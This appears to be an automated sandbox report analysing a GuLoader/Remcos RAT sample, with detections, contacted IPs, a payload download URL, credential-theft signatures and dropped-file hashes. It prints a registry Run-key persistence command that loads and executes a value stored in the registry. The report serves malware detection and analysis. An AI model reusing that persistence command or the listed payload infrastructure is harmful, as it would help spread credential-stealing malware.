        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522631 Sample: SecuriteInfo.com.Win32.Inje... Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 43 geoplugin.net 2->43 51 Suricata IDS alerts for network traffic 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected GuLoader 2->55 57 3 other signatures 2->57 10 SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe 3 29 2->10         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\Aerognosy.Res, ASCII 10->37 dropped 73 Suspicious powershell command line found 10->73 14 powershell.exe 26 10->14         started        signatures6 process7 file8 39 C:\Users\user\AppData\...\Vaccinerende.exe, PE32 14->39 dropped 41 C:\Users\...\Vaccinerende.exe:Zone.Identifier, ASCII 14->41 dropped 75 Writes to foreign memory regions 14->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 14->77 79 Loading BitLocker PowerShell Module 14->79 81 Powershell drops PE file 14->81 18 Vaccinerende.exe 5 14 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 45 107.173.4.16, 2404, 49738, 49739 AS-COLOCROSSINGUS United States 18->45 47 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 18->47 49 192.3.220.22, 49737, 80 AS-COLOCROSSINGUS United States 18->49 59 Multi AV Scanner detection for dropped file 18->59 61 Detected unpacking (changes PE section rights) 18->61 63 Detected Remcos RAT 18->63 65 3 other signatures 18->65 24 Vaccinerende.exe 1 18->24         started        27 Vaccinerende.exe 1 18->27         started        29 Vaccinerende.exe 1 18->29         started        31 5 other processes 18->31 signatures12 process13 signatures14 67 Tries to steal Instant Messenger accounts or passwords 24->67 69 Tries to harvest and steal browser information (history, passwords, etc) 24->69 71 Tries to steal Mail credentials (via file / registry access) 27->71 33 conhost.exe 31->33         started        35 reg.exe 1 1 31->35         started        process15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe24%ReversingLabsWin32.Trojan.Leonem
        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe33%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Vaccinerende.exe24%ReversingLabsWin32.Trojan.Leonem
        C:\Users\user\AppData\Local\Temp\Vaccinerende.exe33%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        geoplugin.net0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://geoplugin.net/json.gp0%URL Reputationsafe
        http://geoplugin.net/json.gp0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://www.imvu.com0%VirustotalBrowse
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        https://www.google.com0%VirustotalBrowse
        https://www.google.com/accounts/servicelogin0%VirustotalBrowse
        https://login.yahoo.com/config/login0%VirustotalBrowse
        http://www.nirsoft.net0%VirustotalBrowse
        http://www.nirsoft.net/0%VirustotalBrowse
        http://www.ebuddy.com0%VirustotalBrowse
        https://github.com/Pester/Pester1%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        geoplugin.net
        		178.237.33.50
        		truefalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://geoplugin.net/json.gpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://192.3.220.22/hFXELFSwRHRwqbE214.binfalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comVaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.imvu.comrVaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://www.imvu.comtaVaccinerende.exe, 0000000E.00000003.3385540576.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000E.00000003.3385506073.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://aka.ms/pscore6lBfqpowershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.comVaccinerende.exe, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://contoso.com/Iconpowershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.google.com/accounts/serviceloginVaccinerende.exefalseunknown
                https://login.yahoo.com/config/loginVaccinerende.exefalseunknown
                http://www.nirsoft.netVaccinerende.exe, 0000000C.00000002.3452099988.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455058048.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalseunknown
                http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Vaccinerende.exe.1.drfalse
                • URL Reputation: safe
                		unknown
                http://www.nirsoft.net/Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                http://crl.microvpowershell.exe, 00000001.00000002.3356692851.00000000070F0000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comVaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    		unknown
                    http://www.ebuddy.comVaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    192.3.220.22
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUSfalse
                    107.173.4.16
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue
                    178.237.33.50
                    		geoplugin.netNetherlands
                    		8455ATOM86-ASATOM86NLfalse

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1522631
                    Start date and time:2024-09-30 13:56:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.evad.winEXE@24/22@1/3
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 238
                    • Number of non-executed functions: 217
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 6284 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size exceeded maximum capacity and may have missing network information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:57:12API Interceptor40x Sleep call for process: powershell.exe modified
                    08:00:22API Interceptor257689x Sleep call for process: Vaccinerende.exe modified
                    12:59:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
                    12:59:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    192.3.220.22PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 192.3.220.22/hFXELFSwRHRwqbE214.bin
                    107.173.4.16PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                      SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                          xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                              Mcib4Llptj.exeGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exeGet hashmaliciousRemcosBrowse
                                  2NyX8R4CZo.exeGet hashmaliciousRemcosBrowse
                                    wcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
                                      1Ccw7uyuFv.exeGet hashmaliciousRemcosBrowse
                                        178.237.33.50z1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • geoplugin.net/json.gp
                                        V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • geoplugin.net/json.gp
                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        geoplugin.netz1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        AS-COLOCROSSINGUSPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                        • 104.168.7.7
                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.245.123.6
                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 104.168.7.7
                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 104.168.7.7
                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 107.173.4.16
                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                        • 192.3.101.137
                                        http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                        • 23.94.221.14
                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                        • 104.168.32.148
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                        • 107.172.130.147
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                        • 192.3.101.29
                                        ATOM86-ASATOM86NLz1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        AS-COLOCROSSINGUSPI#0034250924.xla.xlsxGet hashmaliciousFormBookBrowse
                                        • 104.168.7.7
                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • 172.245.123.6
                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 104.168.7.7
                                        PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                        • 104.168.7.7
                                        PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 107.173.4.16
                                        ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                        • 192.3.101.137
                                        http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                        • 23.94.221.14
                                        C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                        • 104.168.32.148
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                        • 107.172.130.147
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                        • 192.3.101.29

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\Vaccinerende.exePO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER77C9.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Mon Sep 30 12:01:07 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):111362
                                          Entropy (8bit):2.1215395337505636
                                          Encrypted:false
                                          SSDEEP:768:IhVhaH9/IKlfzerUuYdV7YnjBQMBtwLhzhh2F6rjz:IhVkdIrz8FYnBBiLhtoFWjz
                                          MD5:B070E38105BEC63E14A63BDD8176668A
                                          SHA1:076D5DC57E46DE4DF88C025F78B9A6FF39822FF7
                                          SHA-256:B27A0D63877D6AC6C4AF1FEAC92EDC36CD1F21E5CE803098390D002CA428A78D
                                          SHA-512:33926FCDCA2B07AAF7A6B8B30895D09222E8C9F05650BFD01E838EBF6413C3DE9346EA0ABDED14FEB79953A4BDDD10BF0AD534994F10DB6B18D7980B776FC350
                                          Malicious:false
                                          Preview:MDMP..a..... ..........f.........................................S..........T.......8...........T............C..Jo...........'...........)..............................................................................eJ.......)......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER80C2.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):6352
                                          Entropy (8bit):3.718172247130993
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJpJ5t6z5Y2duKprl89blb8sfi8/jm:R6lXJpHt6NY2du1lbPfT6
                                          MD5:F06FB4FF38B71C73BEE14CCB543543E0
                                          SHA1:F9B81777C8DD8635933C535007857046676A3B16
                                          SHA-256:BD08BC34A6E8A8EC2FC2DECDE0418000FE7DDA593689520FAB3A6B5AF0312F86
                                          SHA-512:C3C7EBA543197F01B157A5D24C4E80D80009AB3160D9A1EFE5524FB531AED3A8B568D007AD9C6F78F5707D0A0F106308FCAD2FCD8FF8DEE37A40C8EADA02ED34
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.1.6.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER80F2.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4597
                                          Entropy (8bit):4.447850219967562
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsiiJg77aI9/AjrvWpW8VYsYm8M4J5U1qu1nFt+q8q171H65FtfKAaDa1:uIjfLI75Ajr+7V4JyndzViPfK5ufd
                                          MD5:3B54A03AE56EE41EF3BCEC853B4006C0
                                          SHA1:CC773CF2C9BD63A4A358B25F4ED2A5438A0CEFCB
                                          SHA-256:8E672D0A2EE0AB812C0BF178B6CF60F27A430A3E3475F9B6EBA295CB4128074F
                                          SHA-512:9025D6EF1FFAD6E2EC3247B9A780CB12B230CAE77D630ED14C5D6C15D1DE62D209819599124BA0A3DEF4F9B1C83F0573AF03EBA581EF023119AA2A271A73E2AB
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="522903" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):962
                                          Entropy (8bit):5.013811273052389
                                          Encrypted:false
                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                          Malicious:false
                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):14744
                                          Entropy (8bit):4.992175361088568
                                          Encrypted:false
                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                          Malicious:false
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                          C:\Users\user\AppData\Local\Temp\Vaccinerende.exe

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Category:dropped
                                          Size (bytes):990768
                                          Entropy (8bit):6.298838855552093
                                          Encrypted:false
                                          SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                          MD5:450228D72F9F726B645C55BBBC6DB905
                                          SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                          SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                          SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 24%
                                          • Antivirus: Virustotal, Detection: 33%, Browse
                                          Joe Sandbox View:
                                          • Filename: PO 11001 .xls, Detection: malicious, Browse
